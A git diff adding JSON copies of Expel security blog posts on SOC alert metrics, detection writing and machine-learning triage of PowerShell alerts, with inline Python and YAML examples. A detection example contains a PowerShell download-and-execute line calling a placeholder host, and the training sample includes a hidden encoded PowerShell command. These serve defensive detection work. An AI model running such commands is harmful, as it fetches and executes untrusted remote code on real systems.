This is exactly what we\u2019re looking for! Pro-tip: You can ask the team \u201chow\u2019s it going?\u201d in weekly staff meetings or 1:1s , but I\u2019ve found that by guiding the conversation using data, you\u2019ll get better answers. For example, you can instead ask: Team, the daily alert trend is on a slow and steady climb right now. As a management team we\u2019re digging in, but what are you seeing? Lead with data. It let\u2019s the team know you understand what\u2019s happening and that you have their backs. In fact, it enables you to ask better questions which will lead to more effective answers. Hence why I say that metrics help you take care of the team. Metric #3: Is alert management under control? Technique: Statistical process control Tool: Shewhart control chart and any visualization tool TL;DR: Alert spikes are going to happen. But too many spikes can make it hard for a SOC analyst to find the alerts that matter. \u201cI only want to handle tons of false positives. Finding bad guys isn\u2019t interesting\u201d. \u2013 No SOC Analyst ever. An alert management process in a state of chaos means your SOC analysts are likely feeling the burn. Jon\u2019s perspective: If you\u2019ve spent time in a SOC, you know that bad signatures happen. You also know that experiments to answer \u201chow prevalent is this string or packet globally\u201d can sometimes lead to bad outcomes. And by a bad outcome, I mean tens of thousands or, in extreme cases, hundreds of thousands of false positive alerts. Again, it happens. Which is why effective managers ask: Is alert management in a state of control? To answer this question we use the residuals from our time series decomposition and a Shewhart control chart . Recall that residuals are what we have remaining after we\u2019ve extracted the trend and seasonal components. If you\u2019re unfamiliar with a Shewhart control chart here\u2019s a quick TL;DR: It\u2019s used to understand if a process is in a state of control. There\u2019s an upper control limit (UCL) and lower control limit (LCL) \u2013 we use three standard deviations from the mean. Measurements are plotted on the chart vs. a timeline. Measurements that fall above the UCL or below the LCL are considered to be out of control. Pro-tip: For folks just getting started with statistical process control, \u201c Statistical Process Control for Managers \u201d by Victor Sower is a great place to start. Armed with our residuals, we plot them in a Shewhart control chart using Tableau. Here\u2019s the resulting visualization: Shewhart control chart using alert residuals You might be wondering; what are we looking for? Well for starters, I\u2019m looking for any days where our measurements exceeded the UCL or LCL. From the visualization above you can see there were two days in August 2020 when alert management was \u201cout of control\u201d. On both days we encountered new vendor signatures that resulted in a high volume of false positives. But you can also see we were able to quickly get the situation under control. I also look for periods of time where there\u2019s more variance \u2013 and when I see more variance in our control chart that\u2019s almost always paired with a slow and steady upward trend. By plotting the residuals in a control chart we\u2019re able to answer \u201cis alert management under control\u201d and if not, we can figure out why and react. If we\u2019re seeing more variance, we do the same thing! We dig in, ask questions and adjust. 
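If you want to reproduce this workflow end to end, here's a minimal sketch assuming a date-indexed pandas Series of daily alert counts. The file name and the weekly period are assumptions; the three-standard-deviation control limits follow the approach described above.

```python
import pandas as pd
from statsmodels.tsa.seasonal import seasonal_decompose

# Placeholder input: one row per day with a 'count' column, indexed by date
daily = pd.read_csv("daily_alert_counts.csv", index_col="date", parse_dates=True)["count"]

# Split the series into trend + seasonality + residuals (assume a weekly pattern -> period=7)
result = seasonal_decompose(daily, model="additive", period=7)
result.plot()  # the observed / trend / seasonal / residual panels

# Shewhart-style control limits: residual mean plus or minus three standard deviations
resid = result.resid.dropna()
ucl = resid.mean() + 3 * resid.std()
lcl = resid.mean() - 3 * resid.std()

# Days where alert management was "out of control"
out_of_control = resid[(resid > ucl) | (resid < lcl)]
print(out_of_control)
```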
We like to call this the \u201csmoothed out trend.\u201d And we do this again and again and again. Effective operations management is a process, there is no end state! Monitor, interpret, react, adjust. Rinse, repeat. Remember the \u201cWhy\u201d Super quick recap, promise. We started by performing Change-Point analysis against our aggregated daily alert count. Change-Point analysis let\u2019s us know the daily mean, if it changed and when. We then broke our aggregated daily alert counts into three pieces using time series decomposition: 1) trend 2) seasonality and 3) residuals. We then examined the \u201csmoothed out\u201d trend using a visualization tool to understand what\u2019s happening and then plotted the residuals in a Shewhart control chart to answer \u201cis alert management under control?\u201d Alert operations management process Remember the \u201cwhy\u201d with metrics. Metrics aren\u2019t just for status reports. Highly effective SOC leaders embrace data and use metrics to take care of the team. Again \u2013 if you\u2019re not managing your alerts, they\u2019re managing you. If you\u2019re not using data to spot too much cognitive loading \u2013 or finding ways to free up mental capacity \u2013 that\u2019s a recipe ripe for SOC burnout. And lastly, the quality of your operations management is rooted in the quality of the questions asked. Think about the questions you\u2019re asking today. Are they the right ones? We\u2019ve talked about metrics; how they create an efficient SOC and how they keep our analysts and customers happy. In our last post, we\u2019ll share some IRL examples of what this looks like within the Expel SOC. Don\u2019t miss it! Subscribe to our EXE blog now and be the first to read our third and final installment of our SOC metrics and leadership series." +} \ No newline at end of file diff --git a/performance-metrics-part-3-success-stories.json b/performance-metrics-part-3-success-stories.json new file mode 100644 index 0000000000000000000000000000000000000000..20cb93f432dfa03e9e007bf195afbdfe7c1dc787 --- /dev/null +++ b/performance-metrics-part-3-success-stories.json @@ -0,0 +1,6 @@ +{ + "title": "Performance metrics, part 3: Success stories", + "url": "https://expel.com/blog/performance-metrics-part-3-success-stories/", + "date": "May 18, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Performance metrics, part 3: Success stories Security operations \u00b7 6 MIN READ \u00b7 MATT PETERS, JON HENCINSKI AND ELISABETH WEBER \u00b7 MAY 18, 2021 \u00b7 TAGS: MDR / Metrics / Tech tools In this final post of our three-part blog series on all things SOC metrics and leadership, we\u2019re going to take the framework we described in the previous posts and share how we applied it in some specific situations. We\u2019ll point out a few gotchas and lessons learned along the way. Success story #1: The duplicate alert issue Metric: How many alerts do we move to an open investigation or incident? TL;DR: Finding improvements is often the combination of a set of metrics and the analysis to understand what those metrics mean. As we mentioned in part 1 of the series , one of our strategic goals is to understand our analysts\u2019 capacity and make sure we\u2019re making good use of it. Which means we need to understand what our analysts are doing . 
There are a bunch of ways to measure this, but since we were after understanding it as a process, we measured the various paths an alert can take through our system, and how long each alert spent in each state of our alert system. Understanding at which stages an alert needs a human to get involved gives us an idea of where to focus our optimization energy. So, we added counters and timestamps to measure the path of each alert we processed. The diagram below shows our state machine, and the number of times alerts travel down each path. The data showed us that the number of alerts that were added to existing investigations accounted for 20-25 percent of all the alerts we handled. Expel SOC alert system diagram Now that we have measurements, we have to ask ourselves \u2013 what are they telling us? The data suggested that, while our analysts were investigating something, another alert related to the same behavior would come in. We\u2019ve all been there \u2013 you go heads down and ignore the queue for a few minutes only to pop up again and realize there are 10 more beacons or the network tech is now reporting what the endpoint saw. So the metrics were explainable, and it turned out this was having an impact \u2013 it happened a lot, which was adding up to wasted time. From here, we formulated our reaction. In this case our analysts and our UX team worked together to add a feature to our platform to automatically route related alerts to the appropriate investigation. As part of this process we added configuration to allow the analysts to widen or narrow the alert routing filter, based on what they thought \u201crelated\u201d alerts might be. We deployed these changes into production and watched what the impact was on the SOC. The graph below shows the change interval: Expel alert pathways before and after adding new UX to auto-add an alert to an investigation What we see is that we\u2019ve managed to cut the number of add-tos by 12 percent. Considering that typical triage time is four minutes, this translates to 12 percent x number of Expel alerts x four minutes saved per week for our analysts. Success story #2: So much BEC Metric: How many business email compromise (BEC) incidents do we handle each week and what\u2019s the cycle time? TL;DR: You can simultaneously improve two metrics that are in tension with each other \u2013 like speed and quality \u2013 but you have to be creative to do it. In addition to understanding capacity, another goal is to respond faster than delivery pizza arrives at your door (30 minutes or less). One way we can do that is to stand on the SOC floor and shout: \u201cMove Faster!!!\u201d We\u2019ve all worked there, and it wasn\u2019t good for morale or for quality. We elected to follow a different path. By understanding what type of work was taking the longest and happening the most, we figured we might be able to get crafty and improve performance while keeping quality high. As a general rule, we look at (a) the things we do a lot and (b) the things that take a long time. To figure out where to target our efforts, we used gross counts of incident types \u2013 the theory being that incidents take longer to investigate and report. In this story, our SOC observed that, week-over-week, BEC was one of our most common incident types, making up about 60 percent of the incidents we handle. This looked like a prime place to optimize. From here, we asked the question: What about this process is taking the longest? 
To find the answer, we used a set of path metrics \u2013 each step in each alert is timestamped. By aggregating these timestamps, we learned that reporting was the most time consuming portion of the incident handling, taking over 30 percent of the total incident time. Step in process Typical cycle time (excludes wait time) Triage alert(s) for BEC attempt 3-4 minutes Move to investigation Seconds Preliminary scoping 5-8 minutes Declare incident Seconds Add remediation steps 1-2 minutes Secondary scoping 15-20 minutes Complete summary of \u201cFindings\u201d 20-25 minutes Typical BEC cycle time pre automation This is where things get challenging \u2013 blindly optimizing the reporting could lead to a massive drop in quality. The report, after all, is the thing that tells the org what to do in response. A bad job here and we might as well hang it up. Once again, the combination of Expel\u2019s UX team and the SOC proved to be magical \u2013 they designed an enhanced report including graphics and charts that was both more useful to the customer, as well as more automatable. The speed and quality of our reporting went up! In the table below you can see we improved our BEC incident cycle times by about 34 percent AND the quality of our reporting. Step in process Typical cycle time (excludes wait time) Pre-report automation With report automation Triage alert(s) for BEC attempt 3-4 minutes No change Move to investigation Seconds No change Preliminary scoping 5-8 minutes No change Declare incident Seconds No change Add remediation steps 1-2 minutes No change Secondary scoping 15-20 minutes No change Complete summary of \u201cFindings\u201d 20-25 minutes 5 minutes (-34%) BEC cycle time by step pre and post reporting automation Success story #3: Handing off work to the bots Metric: What classes of work do we see week-over-week? Are the steps well defined? Can we automate the work entirely to free up cognitive loading? TL;DR: Metrics can help you target automation to yield defined benefits in short time periods, rather than trying to generically automate \u201canalysis,\u201d which is a bit like solving the halting problem. We\u2019re constantly looking for ways to remove cumbersome work from humans \u2013 allowing them to focus on the more creative aspects of the job. But first we need to understand what classes of work we\u2019re doing and then figure out what can be automated. To answer these questions, we collect two sets of metrics: Counts of the number of each type of alert we receive Count of each type of action we perform in response to those alerts For example, we get 27 malware alerts per week, and our investigative process involves acquiring a file and detonating it 85 percent of the time. To be clear \u2013 gathering this data was a process rather than a discrete event. We continuously collected metrics to understand the types of actions we were performing along with the classes of alerts we were responding to. Turns out both of these metrics followed a Pareto distribution \u2013 we saw that 85 percent or more of the work was being spent on one or two top talkers: 1) suspicious logins and 2) suspicious file and process activity. To automate investigations into suspicious logins ,we started by understanding how often suspicious login alerts were moved to an investigation. Turns out, a lot. Then we studied which investigative steps our analysts were taking and then handed off the repetitive tasks to the robots. 
The full details can be found here , but the net result is that we improved the median investigation cycle time into suspicious logins by 75 percent! We then repeated this process by automating our investigation into suspicious file and process events, which was also Pareto distributed. At a certain point, we got down to things that we\u2019re not doing often enough to worry about. That\u2019s when we realized the development and maintenance cost exceeded the time and frustration savings. This is an ongoing effort. So far, it helps our analysts in 95 percent of our alert triage in any given week. That\u2019s a wrap! We hope you\u2019ve enjoyed reading this three-part SOC metrics blog series . Before you go off and create metrics for your SOC\u2019s performance, remember: Have a goal in mind before measuring all the things. A clear outcome will inform what to optimize. Leadership is the key to SOC efficiency \u2013 use metrics data to find ways to take care of your team and avoid burnout. Developing metrics doesn\u2019t mean just plugging in numbers for reports. Applying your measurement framework will be unique for each situation \u2013 it\u2019ll require a curious mind, a keen eye and a willingness to always find new ways to improve the process. There\u2019s no more strategic thing than defining where you want to get to and measuring it. Strategy informs what \u201cgood\u201d means and measurements tell you if you\u2019re there or not. Lastly, performing quality control (QC) is vital to your continued success. Check out our Expel SOC QC spreadsheet to see what our analysts look for when assessing performance. As an added bonus, you can get your own copy of this resource. So go ahead and download it (free of charge!) and customize it to fit your org\u2019s needs. Stay tuned \u2013 we\u2019ll be talking more about measuring SOC quality in a blog post coming soon! Download Expel SOC QC template" +} \ No newline at end of file diff --git a/plotting-booby-traps-like-in-home-alone-our-approach-to.json b/plotting-booby-traps-like-in-home-alone-our-approach-to.json new file mode 100644 index 0000000000000000000000000000000000000000..32edbe5be99a580135c6af8bef314064691dbf87 --- /dev/null +++ b/plotting-booby-traps-like-in-home-alone-our-approach-to.json @@ -0,0 +1,6 @@ +{ + "title": "Plotting booby traps like in Home Alone: Our approach to ...", + "url": "https://expel.com/blog/approach-to-detection-writing/", + "date": "Jan 12, 2021", + "contents": "Subscribe \u00d7 EXPEL BLOG Plotting booby traps like in Home Alone: Our approach to detection writing Engineering \u00b7 7 MIN READ \u00b7 MATTHEW HOSBURGH \u00b7 JAN 12, 2021 \u00b7 TAGS: Cloud security / MDR / Tech tools We\u2019re often asked about how we create and prioritize detection at Expel. With so many factors to consider, it\u2019s difficult to give a one-size-fits-all response. We recently hosted an internal conference at Expel that included a detection writing lab to address this very question. The lab resulted in an analogy that I trust most of you reading this can relate to: How D&R engineers are like Kevin from Home Alone. By the time you finish reading this post you\u2019ll have an understanding of our thought process when it comes to writing detections at Expel, how detection writing enables our SOC analysts to make smart decisions as they review an alert and how this process helps us gain a deeper understanding of our customers\u2019 environments. 
Detection while Home Alone The most painful booby trap in Home Alone has got to be the nail through the foot as Marv walks barefoot up those tar smeared steps . Or possibly, when Harry grabs the glowing red-hot doorknob . You can almost smell his pain. But rewind a few days before the Wet Bandits are running through Kevin McCallister\u2019s \u201cfun house\u201d and you can see some of the planning that went into this burglary. The Wet Bandits did their research and profiling before making their move. They knew who was on vacation and even when the timer for the lights would kick-on each night. The difference between the McCallister home and those neighbors who were on vacation is that Kevin was able to identify the Wet Bandit\u2019s objectives early and counter their plan with a battle plan of his own. Throughout the well-loved movie, we\u2019re presented with a master class on how to identify nefarious threat activity at the expense of some of the sharpest burglars that Hollywood ever produced. Suffice it to say, you\u2019ve probably had your fill of holiday movies (or maybe not), but they can serve as a point of reference for what we do at Expel in terms of detection writing. You see, a detection is simply the identification of something interesting on your systems or network. But where it starts to get complicated is when you ask the question: Is this bad? To help orient your detection writing, it\u2018s important to consider risk. \u201cBut I thought risk was just for compliance activities?\u201d Well, understanding risk can serve you well in terms of threat detection and perhaps prioritizing your defenses. What is detection anyway? As noted previously, detection is basically identifying events of interest within your environment. But it goes beyond that. Detection is all about uncovering something that would otherwise remain hidden (or unchecked). Dragos has done a great job distilling the different categories into four major types that I can summarize into the following: Indicator Matching (IPs, file hashes, domains) Behavioral Matching (techniques, combinations of indicators) Configuration (exposed Amazon Web Services [AWS]S3 buckets, incorrectly configured authentication) Manual Efforts (threat hunting and threat modeling, for example) In many environments, there are algorithms or baselines that help to detect things outside of the norm. These are useful in the Expel context as they help us answer questions like: Has this logon exhibited this type of behavior in the past, or is this an outlier? Having an idea of where to start your Detection Quest may rest in a familiar (or painful) practice. Compliance equals security\u2026 (\u256f\u00b0\u25a1\u00b0)\u256f\ufe35 \u253b\u2501\u253b Risk isn\u2019t just for compliance, Marv! In the context of detection, it helps to serve as the guiding light to where we as security practitioners should start (or spend extra time). Why? Because risk represents the sum of threat (which could be an active adversary, opportunistic attacker or malware) and vulnerability (a hole in the fence \u2013 or system, network or cloud environment). Risk informed threat detection When Kevin first overhears the Wet Bandits talking about their plan to rob his home, he\u2019s actually conducting an ad hoc risk approach to threat detection: Threat = burglars eyeing his home (Wet Bandits) Vulnerability = Unlocked doors and/or no one home (no alarm, just light timers) Risk = likelihood the threat will take advantage of the vulnerability (imminent!) 
By examining your vulnerabilities and threats, you can have a better understanding of your organization\u2019s risk. Understanding your known risks and vulnerabilities, you\u2019ll have a greater chance of uncovering the threats that mean something to your organization. Put another way: your ability to create a meaningful detection will be more fruitful. The battle plan Kevin\u2019s rapid assessment requires immediate action: The battle plan . Adding up the known threat and known vulnerabilities, Kevin creates the overall strategy and tactical responses that will help to slow the Wet Bandits down. Similarly, this plan is like your unique organization\u2019s environment, which may incorporate your security tooling, identity providers and your cloud-based infrastructure. Similar to a clever eight-year-old\u2019s battle plan, detection writing requires planning Your battle plan will more than likely have more detail, but largely it serves as a means to understand the areas of your organization that you can obtain data from. This data can be used as the basis for your alerting. Alert data flow and where to start The result of your detection is an alert. An alert is really another way of saying detection (for sake of simple argument), but the key to getting to this point is bringing the relevant log data from the various sources identified in your organization\u2019s battle plan. Notice: I did not say bring in all the data either. Unless you have money to burn, having every log known to your organization is often unreasonable from a cost and storage perspective. Working your way back from your organization\u2019s most notable risks and most important data, you\u2019re able to more effectively prioritize the logs you need. This is often referred to as The Crown Jewel Analysis . The next step is to establish which logs will help make up the most complete picture as it relates to these systems and data. The second step is to understand who your adversary is. Take a breath. This could mean you might need to do some threat modeling . But the key is to understand what your adversary wants from their target (like protected client data, trade secrets or financials). Your threats don\u2019t care how much you\u2019ve spent on your security; they\u2019re more interested in if they\u2019ll be successful in achieving their objectives and if they\u2019ll be caught. The best way to consider this is via a model coined by Josh Corman and David Etue which is known as the Adversary Return on Investment (AROI). Adversary\u2019s Return on Investment (AROI) formula More notional than quantitative, this model helps you understand why your organization might be a target for a particular adversary. Decreasing the adversary\u2019s probability of success via deterrence measures can increase their chances of being caught. This can mean you\u2019re a less appealing target because the return isn\u2019t optimal. With this established, it\u2019s time to create your detection! A rule At Expel, we\u2019re fans of Yet Another Markup Language (YAML). It gives us detection writers the ability to describe what we\u2019re detecting and the detection\u2019s priority, categorization and required investigative steps. Beyond that, it\u2019s the file we use to write our detection logic in \u2013 which you see in the image below. Example YAML Snippet from Expel\u2019s Sunburst IOC Detection The result of the logic often results in an Expel alert, which is what our SOC analysts use to make decisions. 
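As a rough illustration of that idea (the field names and logic below are invented for the example, not our actual rule schema), here's how a YAML-described detection can be loaded and evaluated in Python:

```python
import re
import yaml  # PyYAML

# Hypothetical rule structure, invented purely for illustration
RULE = yaml.safe_load("""
name: suspicious_powershell_download
severity: high
category: lateral-movement
investigative_steps:
  - Review the parent process and user
  - Check the destination domain reputation
logic:
  process_name: powershell.exe
  args_regex: '(?i)downloadstring|invoke-webrequest'
""")

def matches(rule: dict, event: dict) -> bool:
    """Return True if the event satisfies the rule's (toy) logic block."""
    logic = rule["logic"]
    return (
        event.get("process_name", "").lower() == logic["process_name"]
        and re.search(logic["args_regex"], event.get("args", "")) is not None
    )

event = {
    "process_name": "PowerShell.exe",
    "args": "IEX (New-Object Net.WebClient).DownloadString('http://bad.example/a.ps1')",
}
if matches(RULE, event):
    print(f"Alert: {RULE['name']} ({RULE['severity']})")
```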
Remember when Kevin would celebrate when his adversary (the Wet Bandits) would have their faces smashed by an iron or their heads torched? Similarly, we celebrate when we find something \u2013 but it doesn\u2019t stop there. Often an alert may require enrichment or additional details. These details may come directly from the rule itself or they may be provided by our automation robots. There\u2019s no better way to burn out a SOC analyst than by having them look up domain information for hundreds of alerts per day. Instead, we pass most of the enrichment activities to our robots so our analysts have the most relevant information to make an expeditious decision, which keeps them in the proper mindset. Investigative mindset The Expel mindset is all about making a decision based on an alert, or multiple alerts, with minimal manual effort. Our detection writing and response actions are centered around this. Some of the common questions an analyst needs to answer in order to determine next steps (Is this an incident? Does the customer need to be notified? Do I need more information?) are dependent on the following: What am I looking at? Can I use open source tools, or the information returned by our automation, to identify suspicious behavior? If the alert is benign, should I suppress it? Do I need to investigate the activity further? Spotting the trends Spoiler alert: At the end of Home Alone, just when you think the Wet Bandits are about to claim their vengeance against little Kevin, Old Man Marley steps in to serve up his infamous shovel to the head. Unbeknownst to the Wet Bandits, the police are on their way. Once apprehended, the officer states that they now know each and every house they hit because their indicator of compromise (IOC) was running water. At Expel, we monitor and respond to alerts from a variety of customers across industries. Our analysts are at the center of all the action and have the ability to analyze trends over multiple customers, which aids them in the decision-making process. A word about communication Effective communication with the customer is paramount. At the point when the determination is made that the alert does constitute an incident, an analyst would quickly assign the necessary remediation actions to put a stop to an active threat. They would also recommend the required resilience actions to prevent similar threats to the customer\u2019s environment in the future. In certain cases where the threat is ongoing, analysts will arm themselves by creating a Be On the LookOut (BOLO) rule for an indicator, or a collection of indicators, to quickly create a custom detection that alerts on future malicious activity. Finally, analysts may also add certain indicators to the customer context (CCTX) database to quickly pass information among themselves and to help them further understand each customer\u2019s unique environment. All of this is key to detection and response at Expel. Parting words We hope this post has given you insight into how we write detections here at Expel in a more approachable manner. Detection is simply the process of spotting interesting activity on a system or network. Where it truly proves to be valuable is when the alert can help a human make a decision about the bad-ness of what they\u2019re looking at. Similar to the way Kevin kept himself safe in Home Alone, a lot of consideration goes into creating a detection. It takes analysis of risk, vulnerabilities and the relevant threats to the organization. 
Because not all threats or adversaries are created equal, it\u2019s important to present detailed information, with minimal manual intervention, to the analyst so they can make a determination on next steps. Finally, communication \u2013 just like how Kevin reported the Wet Bandits to the authorities \u2013 is an important step in response. \u201cYou guys give up? Or are you thirsty for more?\u201d \u2013 Kevin McCallister" +} \ No newline at end of file diff --git a/prioritizing-suspicious-powershell-activity-with-machine.json b/prioritizing-suspicious-powershell-activity-with-machine.json new file mode 100644 index 0000000000000000000000000000000000000000..24cc290027941599aef259c5256952d44a1366bf --- /dev/null +++ b/prioritizing-suspicious-powershell-activity-with-machine.json @@ -0,0 +1,6 @@ +{ + "title": "Prioritizing suspicious PowerShell activity with machine ...", + "url": "https://expel.com/blog/prioritizing-suspicious-powershell-activity-with-machine-learning/", + "date": "Jul 21, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Prioritizing suspicious PowerShell activity with machine learning Tips \u00b7 6 MIN READ \u00b7 ELISABETH WEBER \u00b7 JUL 21, 2020 \u00b7 TAGS: Get technical / How to / Managed detection and response / Managed security / SOC PowerShell in a nutshell: It\u2019s a legitimate management framework tool used for system administration but is commonly used by attackers looking to \u201clive off the land\u201d ( LOL ) because of its availability and extensibility across Windows machines. So, why are we talking about PowerShell specifically? PowerShell historically is a go-to tool for attackers because it\u2019s a scripting language that is easily extensible and exists by default on most Windows machines. It\u2019s also commonly used by administrators, which is why differentiating between administrative activity and malicious PowerShell use is important. This is where I came in. (*waves* Hi! I\u2019m Expel\u2019s senior data scientist.) In this blog post, I\u2019ll talk about how I used machine learning in combination with the expertise of our SOC analysts to make it easier and faster for them to triage PowerShell alerts. Incoming First, I\u2019d like to set the stage. Expel is a technology company that has built a SaaS platform (Expel Workbench) to enable our 24\u00d77 MDR (managed detection and response) service. We integrate directly with the APIs of more than 45 different security vendors, 12 of which are EDRs (endpoint detection and response). We pull alerts from these devices, normalize them to an Expel-specific format and process them through a detection engine we lovingly call Josie. Alerts then show up in the Expel Workbench with an Expel-assigned severity. Getting our priorities straight Before you get to triaging, you\u2019ve got to figure out a way to know when it\u2019s the right time to sound the alarm. Each severity is in its own queue. Analysts work from critical to low, or visually you can think about this as working from left to right. A critical alert, for example, has an SLO (service-level objective) of an analyst picking it up within five minutes of it arriving in the queue. We can use these queues, shuffling alerts based on our confidence, to react more quickly to higher-confidence alerts. Alerts that fall into the high queue are triaged by our analysts first. Then they look at medium alerts, followed by low-priority alerts. Using this queueing method helps to ensure that the most urgent alerts are viewed by analysts first. 
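To make the queueing idea concrete, here is a minimal sketch of severity-based alert queueing, not Expel's actual implementation. The five-minute SLO for critical alerts comes from the post; the other SLO values, severity names and class names are illustrative assumptions.

```python
# Minimal sketch of severity-based alert queueing -- illustrative only, not Expel's code.
# The five-minute critical SLO comes from the post; other SLO values are assumptions.
import heapq
from dataclasses import dataclass, field
from datetime import datetime

# Lower rank = higher priority; SLO is the target pickup time in minutes (assumed
# for every tier except critical).
SEVERITIES = {"critical": (0, 5), "high": (1, 15), "medium": (2, 60), "low": (3, 240)}


@dataclass(order=True)
class QueuedAlert:
    rank: int
    received_at: datetime
    name: str = field(compare=False, default="")
    severity: str = field(compare=False, default="low")


class AlertQueue:
    """Analysts pop the highest-severity, oldest alert first ("left to right")."""

    def __init__(self) -> None:
        self._heap: list[QueuedAlert] = []

    def push(self, name: str, severity: str) -> None:
        rank, _slo_minutes = SEVERITIES[severity]
        heapq.heappush(self._heap, QueuedAlert(rank, datetime.utcnow(), name, severity))

    def pop_next(self) -> QueuedAlert:
        return heapq.heappop(self._heap)


if __name__ == "__main__":
    queue = AlertQueue()
    queue.push("suspicious PowerShell arguments", "low")
    queue.push("ransomware precursor activity", "critical")
    print(queue.pop_next().severity)  # "critical" -- picked up before the low alert
```

Confidence-based reprioritization (described next for PowerShell alerts) would simply change an alert's rank before it is pushed onto the queue.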
Seems simple, right? Well, figuring out where an alert falls in this queue is the tricky part. Typically, we make this determination by looking at an entire class of alerts and assigning a priority level to that entire class. For example, based on our experience with vendor Y, we map alert category X to Expel severity Q. This is an example of us mapping a whole category of alerts to a specific Expel severity. However, for PowerShell alerts, we now use a machine learning model to predict the likelihood that each individual PowerShell alert is malicious. Based on that prediction, we determine at which priority level to place the alert in the queue. For example, if we predict that an incoming PowerShell alert has a 95 percent likelihood of being malicious, this alert would be placed in the high-priority queue, ensuring that analysts quickly investigate it. This way, our SOC team can quickly respond to threats in our customers\u2019 environments. Wait\u2026predicting the percentage likelihood of an alert being malicious? It\u2019s not sorcery, I promise. It\u2019s math. To determine the likelihood that a PowerShell alert is malicious, we use a decision tree-based classification model with several different features. It\u2019s trained on past alerts that our SOC analysts have triaged. All decisions that our analysts make about an alert are recorded in Expel Workbench. The decision points, like moving an alert to investigation, closing it as a false positive or declaring it a true positive and moving to an incident, serve as ground truth labels that we can use when building our classification model. You\u2019ll see an example of a machine learning decision tree below. Our model features are extracted from the PowerShell process arguments. Based on those features, the model essentially makes a series of decisions until it reaches a conclusion as to whether or not the activity is malicious. Example decision tree After the alert\u2019s process arguments go through all the decision points, we\u2019re able to predict the likelihood that the alert is malicious. While this example is much more simplified than Expel\u2019s actual decision trees, it shows you the basic process for how the model is applied to make decisions. The model we created at Expel to help us prioritize PowerShell alerts uses LightGBM, which basically combines several decision trees (similar to the one above). They\u2019re all slightly different but cumulatively create greater efficiency in determining how likely an argument (alert) is to be malicious. Our model uses more than 30 different features. Here\u2019s an example of a few: Entropy of the process argument Count variables: these count the number of times special characters like +, @, $ and more are found in the process arguments String indicator variables: these check if specific strings, like \u201cinvoke\u201d or \u201c-enc\u201d/\u201c-ec\u201d/\u201c-e\u201d, are present in the process arguments What does this look like at Expel? Who\u2019s on the front line of defense? You guessed it \u2013 our robots. Our analysts are supported by technology we\u2019ve built at Expel. In the case of triage, we\u2019re constantly adding new automated tasks. We think of each task as a robot with a specific job. So, it shouldn\u2019t come as a surprise that we\u2019ve also implemented the PowerShell classification task in a robot. 
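Here is a minimal sketch of the kind of feature extraction and LightGBM scoring described above, not Expel's real model or feature set. The three feature families shown (argument entropy, special-character counts, string-indicator flags) come from the post; the toy training data, model parameters and the 0.95 reprioritization threshold are illustrative assumptions.

```python
# Minimal sketch of PowerShell-argument feature extraction and LightGBM scoring.
# Illustrative only: training data, parameters and the 0.95 threshold are assumptions.
import math
from collections import Counter

import lightgbm as lgb
import numpy as np

SPECIAL_CHARS = "+@$"                               # examples called out in the post
INDICATOR_STRINGS = ("invoke", "-enc", "-ec", "-e")


def shannon_entropy(text: str) -> float:
    """Entropy of the process argument string (encoded/obfuscated args tend to score higher)."""
    if not text:
        return 0.0
    counts = Counter(text)
    total = len(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def extract_features(process_args: str) -> list[float]:
    args = process_args.lower()
    features = [shannon_entropy(args)]
    features += [float(args.count(ch)) for ch in SPECIAL_CHARS]   # special-character counts
    features += [float(s in args) for s in INDICATOR_STRINGS]     # string-indicator flags
    return features


# Toy labels standing in for past analyst triage decisions (1 = malicious, 0 = benign).
train_args = [
    "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]
X = np.array([extract_features(a) for a in train_args])
y = np.array([1, 0])

model = lgb.LGBMClassifier(n_estimators=25, min_child_samples=1)
model.fit(X, y)


def reprioritize(process_args: str, threshold: float = 0.95) -> str:
    """Never suppresses an alert; only bumps severity when the score clears the threshold."""
    score = model.predict_proba(np.array([extract_features(process_args)]))[0][1]
    return "high" if score >= threshold else "unchanged"
```

In production you would train on thousands of labeled alerts rather than two toy rows, but the shape of the pipeline (extract features, score, compare to a threshold) matches the robot workflow described next.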
When an alert comes in, our robots check if it contains a PowerShell process (yes \u2013 we\u2019re fully aware you can bypass this by renaming PowerShell). If so, the robot runs the PowerShell arguments through the classification model to get a prediction. Once the robot has the prediction, it reprioritizes the alert if necessary and includes a note on the alert to let our analysts know that the alert was reprioritized. It is very important to note that this robot will never suppress an alert; it can only change the severity. The process looks like this: PowerShell model process Let\u2019s look at an example of an alert going through the process. Below, you\u2019ll see an alert that came in and is being assessed as PowerShell activity. First, the robot checks if the PowerShell process is present, and if so, it runs those process arguments through the PowerShell model. The image below shows an example of process arguments that would get pushed through this model. Example of process args After the arguments run through the model, we get a score of how likely it is that the arguments are malicious. If that score is above a defined threshold, we reprioritize the alert to a higher point in the queue. And finally, if an alert is reprioritized, our analysts will see a note in Expel Workbench (see example below). Analyst view in Expel Workbench after alert is reprioritized The analyst will still triage the alert as normal; they\u2019ll just be doing it sooner. The example we just walked through was actually an incident that our analysts caught sooner because we moved the initial alert from low to high in our queue. Three things we learned after productionalizing our first machine learning model: This was a collaborative effort, and working not only with Expel\u2019s internal teams but also with our stakeholders helped us come away with some key insights. As you consider applying machine learning, here are a few things we at Expel learned and believe. 1. Have a way to monitor the model in production. Keep a line of sight on the model\u2019s performance once implemented. Track metrics like the count of alerts that were evaluated by the model as well as how many of those alerts were actually reprioritized. We also continue to monitor how well the model identifies truly malicious alerts, assessing how many high-priority alerts turn out to be malicious activity. We use DataDog to monitor our applications, so we\u2019ve bent it to our will and use it to monitor this model\u2019s performance. I\u2019ve provided an example of our dashboard in the image below, which shows the past month of PowerShell activity. Example image of Expel Workbench 2. Run machine learning in parallel with human eyes to build trust. Machine learning techniques can sometimes feel like a black box. Because of this, it\u2019s important to overcommunicate what you are doing and also make it clear the technology is a way of supplementing human work rather than replacing it. Overcommunication, and stakeholder buy-in, helps us enhance the feedback loop with our stakeholders. This builds trust and increases feedback, which inevitably improves the overall performance of the model over time. 3. Have a way for users to provide feedback. Since our analysts are working with these alerts every day, they\u2019re able to provide great long-term feedback on the model results in production. 
